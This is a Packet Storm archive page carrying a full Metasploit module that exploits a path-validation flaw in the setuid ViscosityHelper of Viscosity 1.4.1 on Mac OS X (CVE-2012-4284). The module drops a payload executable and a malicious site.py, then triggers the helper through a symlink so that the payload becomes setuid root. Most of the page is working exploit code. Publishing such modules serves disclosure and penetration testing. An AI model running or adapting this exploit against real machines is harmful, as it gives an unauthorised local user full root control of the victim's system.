Exploit the possiblities

Viscosity setuid-set ViscosityHelper Privilege Escalation

Viscosity setuid-set ViscosityHelper Privilege Escalation
Posted Mar 5, 2013
Authored by juan vazquez, Jason A. Donenfeld | Site metasploit.com

This Metasploit module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This Metasploit module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.

tags | exploit, arbitrary, root, python
systems | apple, osx
advisories | CVE-2012-4284, OSVDB-84709
MD5 | fcfbba244b7ada20cab640eca6e0bbf0

Viscosity setuid-set ViscosityHelper Privilege Escalation

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/exploit/exe'

class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Post::Common

def initialize(info={})
super( update_info( info, {
'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The
vulnerability exists in the setuid ViscosityHelper, where an insufficient
validation of path names allows execution of arbitrary python code as root.
This module has been tested successfully on Viscosity 1.4.1 over Mac OS X
10.7.5.
},
'References' =>
[
[ 'CVE', '2012-4284' ],
[ 'OSVDB', '84709' ],
[ 'EDB', '20485' ],
[ 'URL', 'http://blog.zx2c4.com/791' ]
],
'License' => MSF_LICENSE,
'Author' =>
[
'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
'juan vazquez' # Metasploit module
],
'DisclosureDate' => 'Aug 12 2012',
'Platform' => 'osx',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell' ],
'Targets' =>
[
[ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
[ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
'DefaultTarget' => 0
}))
register_options([
# These are not OptPath becuase it's a *remote* path
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])
], self.class)
end

def check
if not file?(datastore["Viscosity"])
print_error "ViscosityHelper not found"
return CheckCode::Safe
end

check = session.shell_command_token("find #{datastore["Viscosity"]} -type f -user root -perm -4000")

if check =~ /ViscosityHelper/
return CheckCode::Vulnerable
end

return CheckCode::Safe
end

def clean
file_rm(@link)
file_rm(@python_file)
file_rm("#{@python_file}c")
file_rm(@exe_file)
end

def exploit

exe_name = rand_text_alpha(8)
@exe_file = "#{datastore["WritableDir"]}/#{exe_name}"
print_status("Dropping executable #{@exe_file}")
write_file(@exe_file, generate_payload_exe)

evil_python =<<-EOF
import os
os.setuid(0)
os.setgid(0)
os.system("chown root #{@exe_file}")
os.system("chmod 6777 #{@exe_file}")
os.execl("#{@exe_file}", "#{exe_name}")
EOF

@python_file = "#{datastore["WritableDir"]}/site.py"
print_status("Dropping python #{@python_file}...")
write_file(@python_file, evil_python)

print_status("Creating symlink...")
link_name = rand_text_alpha(8)
@link = "#{datastore["WritableDir"]}/#{link_name}"
cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}"

print_status("Running...")
begin
cmd_exec "#{@link}"
rescue
print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...")
clean
return
end
print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}")
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    1 Files
  • 22
    Jan 22nd
    15 Files
  • 23
    Jan 23rd
    12 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close